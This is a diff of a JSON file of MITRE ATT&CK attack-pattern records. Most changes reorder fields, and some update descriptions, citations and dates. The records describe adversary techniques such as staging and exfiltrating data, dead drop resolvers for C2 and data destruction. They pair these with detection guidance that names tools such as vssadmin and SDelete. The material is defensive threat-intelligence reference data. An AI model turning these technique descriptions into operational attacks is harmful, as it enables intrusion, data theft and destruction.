- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Jan Petrov, Citi"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -6192,16 +6431,16 @@
],
"modified": "2020-03-27T20:54:28.287Z",
"created": "2020-03-11T14:56:34.154Z",
+ "x_mitre_data_sources": [
+ "DNS records"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.",
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ],
- "x_mitre_detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "DNS records"
]
},
{
@@ -6278,28 +6517,28 @@
],
"modified": "2020-03-27T21:08:19.783Z",
"created": "2019-03-14T18:47:17.701Z",
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process command-line parameters",
- "Process monitoring"
- ],
- "x_mitre_version": "1.0",
"x_mitre_permissions_required": [
"User",
"Administrator",
"root",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process command-line parameters",
+ "Process monitoring"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.",
+ "x_mitre_impact_type": [
+ "Availability"
+ ]
},
{
"id": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f",
@@ -6340,27 +6579,27 @@
],
"modified": "2020-03-14T23:39:50.338Z",
"created": "2017-05-31T21:31:43.540Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Itzik Kotler, SafeBreach"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_network_requirements": true,
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_network_requirements": true,
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_contributors": [
+ "Itzik Kotler, SafeBreach"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -6431,29 +6670,29 @@
],
"modified": "2020-03-27T21:09:28.699Z",
"created": "2019-03-15T13:59:30.390Z",
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "root",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_impact_type": [
+ "Availability"
],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.",
"x_mitre_data_sources": [
"Kernel drivers",
"File monitoring",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.",
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "root",
+ "SYSTEM"
+ ],
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -6479,29 +6718,29 @@
],
"modified": "2020-03-28T23:16:20.202Z",
"created": "2020-03-02T14:19:22.609Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Packet capture",
- "Network protocol analysis",
- "File monitoring",
- "Application logs"
- ],
- "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.",
- "x_mitre_impact_type": [
- "Integrity"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator",
"root",
"SYSTEM"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.",
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Network protocol analysis",
+ "File monitoring",
+ "Application logs"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842",
@@ -6532,27 +6771,27 @@
],
"modified": "2020-03-15T00:40:27.670Z",
"created": "2017-05-31T21:30:18.931Z",
- "x_mitre_version": "1.1",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
- "x_mitre_network_requirements": true,
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Data Staged",
- "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
+ "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -6563,6 +6802,11 @@
"source_name": "PWC Cloud Hopper April 2017",
"description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.",
"url": "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
}
],
"object_marking_refs": [
@@ -6575,15 +6819,13 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-24T17:26:16.286Z",
+ "modified": "2020-06-24T18:59:16.039Z",
"created": "2017-05-31T21:30:58.938Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian",
+ "Shane Tully, @securitygypsy"
],
- "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -6592,11 +6834,13 @@
"GCP",
"Azure"
],
- "x_mitre_contributors": [
- "Praetorian",
- "Shane Tully, @securitygypsy"
+ "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"id": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd",
@@ -6625,22 +6869,23 @@
"phase_name": "exfiltration"
}
],
- "modified": "2019-06-24T12:03:02.387Z",
+ "modified": "2020-07-14T19:47:46.912Z",
"created": "2017-05-31T21:30:34.523Z",
- "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Netflow/Enclave netflow",
"Process use of network",
"Process monitoring"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
- "x_mitre_network_requirements": true,
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
@@ -6694,26 +6939,27 @@
"phase_name": "collection"
}
],
- "modified": "2019-10-22T20:02:00.249Z",
+ "modified": "2020-07-09T14:02:05.276Z",
"created": "2019-08-30T18:07:27.741Z",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Netskope",
+ "Praetorian"
+ ],
+ "x_mitre_detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.",
"x_mitre_data_sources": [
"Stackdriver logs",
"Azure activity logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.",
- "x_mitre_contributors": [
- "Netskope",
- "Praetorian"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure"
+ "x_mitre_permissions_required": [
+ "User"
]
},
{
@@ -6737,7 +6983,7 @@
"source_name": "Atlassian Confluence Logging"
}
],
- "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nAdversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.\n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001).",
+ "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nAdversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.\n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.",
"name": "Data from Information Repositories",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416",
@@ -6748,22 +6994,14 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-24T16:42:09.364Z",
+ "modified": "2020-06-30T22:50:06.087Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS",
- "SaaS",
- "AWS",
- "GCP",
- "Azure",
- "Office 365"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.1",
+ "x_mitre_contributors": [
+ "Praetorian",
+ "Milos Stojadinovic"
],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
"x_mitre_data_sources": [
"Azure activity logs",
"AWS CloudTrail logs",
@@ -6774,18 +7012,34 @@
"Data loss prevention",
"Third-party application logs"
],
- "x_mitre_contributors": [
- "Praetorian",
- "Milos Stojadinovic"
+ "x_mitre_detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_version": "2.1",
- "x_mitre_is_subtechnique": false
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS",
+ "SaaS",
+ "AWS",
+ "GCP",
+ "Azure",
+ "Office 365"
+ ]
},
{
- "id": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Data from Local System",
- "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
+ "created": "2017-05-31T21:30:20.537Z",
+ "modified": "2020-05-26T19:21:25.974Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -6793,21 +7047,10 @@
"external_id": "T1005"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-03-24T15:40:46.979Z",
- "created": "2017-05-31T21:30:20.537Z",
- "x_mitre_contributors": [
- "Praetorian"
- ],
+ "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n",
+ "name": "Data from Local System",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"x_mitre_version": "1.2",
"x_mitre_data_sources": [
"File monitoring",
@@ -6821,10 +7064,7 @@
"x_mitre_platforms": [
"Linux",
"macOS",
- "Windows",
- "GCP",
- "AWS",
- "Azure"
+ "Windows"
],
"x_mitre_is_subtechnique": false
},
@@ -6857,22 +7097,22 @@
],
"modified": "2020-03-24T15:42:44.026Z",
"created": "2017-05-31T21:30:41.022Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_system_requirements": [
- "Privileges to access network shared drive"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_system_requirements": [
+ "Privileges to access network shared drive"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
@@ -6898,24 +7138,40 @@
],
"modified": "2020-03-24T15:44:46.584Z",
"created": "2017-05-31T21:30:31.584Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_system_requirements": [
- "Privileges to access removable media drive and files"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_system_requirements": [
+ "Privileges to access removable media drive and files"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.1"
},
{
+ "created": "2020-03-14T22:24:21.841Z",
+ "modified": "2020-03-26T23:12:30.499Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
+ "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
+ "name": "Dead Drop Resolver",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -6928,22 +7184,6 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Dead Drop Resolver",
- "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
- "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-26T23:12:30.499Z",
- "created": "2020-03-14T22:24:21.841Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -6985,18 +7225,10 @@
"phase_name": "impact"
}
],
- "modified": "2020-03-29T22:57:05.545Z",
+ "modified": "2020-04-22T15:19:31.682Z",
"created": "2019-04-08T17:51:41.390Z",
- "x_mitre_data_sources": [
- "Packet capture",
- "Web application firewall logs",
- "Web logs",
- "Packet capture"
- ],
- "x_mitre_detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n",
- "x_mitre_impact_type": [
- "Integrity"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7005,8 +7237,16 @@
"GCP",
"Azure"
],
- "x_mitre_version": "1.1",
- "x_mitre_is_subtechnique": false
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n",
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Web application firewall logs",
+ "Web logs",
+ "Packet capture"
+ ]
},
{
"external_references": [
@@ -7054,6 +7294,19 @@
],
"modified": "2020-03-23T21:37:34.567Z",
"created": "2020-03-13T20:15:31.974Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+ "x_mitre_data_sources": [
+ "AWS CloudTrail logs",
+ "Stackdriver logs",
+ "Authentication logs",
+ "Process monitoring"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7064,20 +7317,69 @@
"Office 365",
"Azure AD",
"SaaS"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578.003",
+ "url": "https://attack.mitre.org/techniques/T1578/003"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ },
+ {
+ "source_name": "AWS CloudTrail Search",
+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/",
+ "description": "Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Azure Activity Logs",
+ "url": "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs",
